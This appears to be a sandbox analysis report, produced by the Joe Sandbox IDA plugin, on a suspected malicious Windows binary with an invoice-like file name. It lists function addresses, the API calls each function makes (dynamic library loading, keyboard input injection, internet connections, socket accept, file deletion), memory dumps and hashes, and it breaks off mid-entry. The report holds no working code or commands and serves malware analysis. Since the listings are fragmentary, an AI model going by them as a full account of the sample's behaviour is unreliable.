Opcode ID: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
Instruction ID: 7c59fbfb6b4ca0e17cfd6f52eeb59ceeab1eb4fde61983d69c0c64ea1134d3dc
Opcode Fuzzy Hash: 1baa843c15d4aa84f7371d9cfd441dae3656d134a11f4f2df08628294462d9bd
Instruction Fuzzy Hash: F9D0A730800722AFD720DF20F80C75677E4EF10701B20CC3FE44AD2294D6B8C8808B28

Function 0045ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0045ECBE,?,0045EBBB), ref: 0045ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0045ECE8

Strings

kernel32.dll, xrefs: 0045ECD1
GetSystemWow64DirectoryW, xrefs: 0045ECE2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
Instruction ID: dcea914721d27dac4ff341c8df08104a786117995b40904736e34123f29db048
Opcode Fuzzy Hash: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
Instruction Fuzzy Hash: A6D0A730800723AFCB255F62E84C74777E4AF00701B10883FFC56D2292DBB8C8849B28

Function 0045AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0045AAB4
CoUninitialize.OLE32 ref: 0045AABF

Part of subcall function 00440213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B

VariantInit.OLEAUT32(?), ref: 0045AACA
VariantClear.OLEAUT32(?), ref: 0045AD9D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
Instruction ID: 5d8e7bca6c7e322d321c672a29ad7db6d4310834907c2f740fef39762054d400
Opcode Fuzzy Hash: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
Instruction Fuzzy Hash: ABA17C356047019FC701EF25C481B1AB7E5BF48315F04855EFA969B3A2CB38ED59CB8A

Function 004391CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004391DD
SysAllocString.OLEAUT32(?), ref: 00439286
VariantCopy.OLEAUT32 ref: 004392B5
VariantClear.OLEAUT32(?), ref: 004392DC

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
Instruction ID: ca1cb1d64e1576214c9d43b4a1f36021c070d9c51f8d913170cfb391135d6413
Opcode Fuzzy Hash: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
Instruction Fuzzy Hash: E851A570A443069BDB24AF66D49166EB3E5EF4C314F20A82FE946D72D1DBBC9C81870D

Function 0042365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004236B7
_memcpy_s.LIBCMT ref: 00423729
__filbuf.LIBCMT ref: 004237AA
_memset.LIBCMT ref: 004237EE

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 2ebd63b5f1109b17f0c2738a0f9f126dfcc81151958d9025ba2ca9ad80a75854
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: F351E8B0B00225ABCF249F69A88455F77B5AF40325F64862FF825963D0D77C9F51CB48

Function 0046C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00BEA948,?), ref: 0046C544
ScreenToClient.USER32(?,00000002), ref: 0046C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0046C5DA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5dac36bbfbf88a7458cc0230f80005ee9af9aca2bc4d09f53f21e1134249c3f3
Instruction ID: 87e5a9bfdfff9c845bf647487e866e9cced1a94fbcbcc4f7d8d1e25b4db0f31c
Opcode Fuzzy Hash: 5dac36bbfbf88a7458cc0230f80005ee9af9aca2bc4d09f53f21e1134249c3f3
Instruction Fuzzy Hash: D6515E75A00214AFCF10DF68C8C0ABE77B5EB55324F10866AF89597291E734ED41CB99

Function 0043C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0043C462
__itow.LIBCMT ref: 0043C49C

Part of subcall function 0043C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0043C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0043C505
__itow.LIBCMT ref: 0043C55A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
Instruction ID: 800f785b87ce5464c2f688b8ea43766e1c02cbf4e719b26cad73e40aff914bb9
Opcode Fuzzy Hash: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
Instruction Fuzzy Hash: 4041B571A00218BBDF21DF55C892BEE7BB5AF58704F00102EF905B72C1DB789A458BA9

Function 0044390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00443966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00443982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004439EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00443A4D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2c939a98cf763ffb77da0aece4c4b47de92a8762862d89eb48351c3921102d85
Instruction ID: 469bf99c801f96624eea77c586d463107e8b0cfafe3e1a68cffd4768a2f07c69
Opcode Fuzzy Hash: 2c939a98cf763ffb77da0aece4c4b47de92a8762862d89eb48351c3921102d85
Instruction Fuzzy Hash: A74119B0E442486AFF208F6588067FEBBB59B45712F04015BF4C1A22C1C7BC9E85D76D

Function 00AF34FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00AF354C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF35D5
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AF35E7
__freea.LIBCMT ref: 00AF35F0

Part of subcall function 00AF32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AF332C

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2e72f8407c7ecd12aa801d038b57a94a2790a4ea1af08e271be039e5439aa81b
Instruction ID: 36ebaf2d8c68e7132cea25c191c297b77b0d9b8e3e30f60157b515e2d49fef9f
Opcode Fuzzy Hash: 2e72f8407c7ecd12aa801d038b57a94a2790a4ea1af08e271be039e5439aa81b
Instruction Fuzzy Hash: 21319A72A0020AAFDF259FA4DC85DBF7BA5EF80310B054228F904D7250EB35DE95CB90

Function 0044E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0044E742
GetLastError.KERNEL32(?,00000000), ref: 0044E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0044E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0044E7B9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 88b17f692d8923e6e1f1b884cdf447b11d7de581a9de8c5022e799896a57d2ed
Instruction ID: a2bdcbcb23e6067ac7ad5f975947d6cfe77527ed2825ba135b237677522510d0
Opcode Fuzzy Hash: 88b17f692d8923e6e1f1b884cdf447b11d7de581a9de8c5022e799896a57d2ed
Instruction Fuzzy Hash: 1B413C35600610DFCF11EF26C54494DBBE5BF59724B09849AED46AB3A2CB78FC40CB99

Function 0046B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0046B5D1

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4468e08ec7a5a13a57baa00e831cc90bcc106295cf6b275835b4ddfad8e98b7a
Instruction ID: c86e180ac39fdd8a69f0b1340c4036a34fcc01a06aab4df10420dcd6b6513ddd
Opcode Fuzzy Hash: 4468e08ec7a5a13a57baa00e831cc90bcc106295cf6b275835b4ddfad8e98b7a
Instruction Fuzzy Hash: 3531D034601208BBEB208A19CC84FEA3765EB06354F544517FA12D62F1F738A9C08BDF

Function 0046D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0046D807
GetWindowRect.USER32(?,?), ref: 0046D87D
PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D
MessageBeep.USER32(00000000), ref: 0046D8FE

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
Instruction ID: 5fa1f60125daaa5e84eea42d34aebc29e8453dd218e4da573cb7e242a531e712
Opcode Fuzzy Hash: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
Instruction Fuzzy Hash: EE418C70F00218DFCB11EF59C888F697BB5FB45314F1881AAE4249B261E334E945CB4A

Function 00434004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00434038
__isleadbyte_l.LIBCMT ref: 00434066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00434094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004340CA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
Instruction ID: 18c0360fd1569c977bfde1c2717b0e17dfe99921f0502833c073a699be0c4c70
Opcode Fuzzy Hash: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
Instruction Fuzzy Hash: 5531D230700216AFDB259F35C844BEB7BB5BF89320F15542AE661872E0E735E891DB98

Function 0046F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetCursorPos.USER32(?), ref: 0046F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0047E4C0,?,?,?,?,?), ref: 0046F226
GetCursorPos.USER32(?), ref: 0046F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0047E4C0,?,?,?), ref: 0046F2A6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
Instruction ID: 421acbc8388f5fa8e11c8d5781fd18043b8c951ec840c19c7752c1421d3c3654
Opcode Fuzzy Hash: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
Instruction Fuzzy Hash: 0521F238601018BFCB158F95E868EEF7BB5EF0A310F0440AAF945472A2E3399950DF95

Function 0045431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00454358

Part of subcall function 004543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
Part of subcall function 004543E2: InternetCloseHandle.WININET(00000000), ref: 0045449E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
Instruction ID: f2f30b271a6af74a9d7b134cde8f3afa5d8ff7ebb5d92f8591c0153e2dca6813
Opcode Fuzzy Hash: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
Instruction Fuzzy Hash: C521D431701601BBEB119F60DC00F7BB7A9FF8471AF00402FBE159B6A1D7759869A798

Function 00458A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00458AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00458AFF
WSAGetLastError.WSOCK32(00000000), ref: 00458B16

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
Instruction ID: cec81d560cfc8959454608d08dcc177ad0e4f6f8aca8df67afe39ee5a7d451b4
Opcode Fuzzy Hash: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
Instruction Fuzzy Hash: 9E21C372A011249FC7109F69C885A9EBBECEF49310F00416EF849E7291DB789A458F94

Function 00468A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00468AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00468ADC

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
Instruction ID: 3b2d1d0a209467fe1eaa344d409eb254f997c443b6415a419c9b2e187924ca12
Opcode Fuzzy Hash: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
